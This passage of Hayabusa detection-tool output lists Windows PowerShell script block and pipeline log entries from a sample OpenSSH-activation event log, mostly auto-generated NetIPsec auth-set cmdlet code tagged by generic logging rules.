[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper 
-is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 
'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ 
} { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.518 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.521 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.523 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
